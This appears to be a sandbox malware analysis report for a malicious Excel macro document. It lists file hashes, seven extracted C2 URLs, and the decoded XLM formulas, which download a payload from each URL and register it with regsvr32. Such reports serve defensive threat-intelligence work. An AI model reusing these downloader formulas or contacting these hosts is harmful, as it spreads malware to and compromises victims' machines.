General

  • Target

    43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900

  • Size

    38KB

  • MD5

    14a5b683d63be536a46f49b448767eff

  • SHA1

    ca835d420edffbad031e671b9674f544671a8da8

  • SHA256

    43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900

  • SHA512

    a740840a6d55765782872e297bfb7d2fa21c4d5725309139b470135d1e81fa5b33145029c12bfb5016e299eb1022239e606ed35b4780102ebfbb3e2735e70e65

  • SSDEEP

    768:WhACdvR8DjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyI:D65YOZZ1ZYpoQ/pMAeVIybs/

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.rivabodrumresort.com/eski_site/cM2jewS/

https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/

https://localart.net/wp-content/uploads/5rH1dzF11HBD/

https://globaltextiles.net/cgi-bin/M2Gi8MLnY/

https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/

https://sarc.in/wp-admin/ktPHMSvi/

https://www.iinil.com/phpmyadmin/bMnR/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/cM2jewS/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/5rH1dzF11HBD/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/M2Gi8MLnY/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/ktPHMSvi/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/bMnR/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
    .xlsm office2007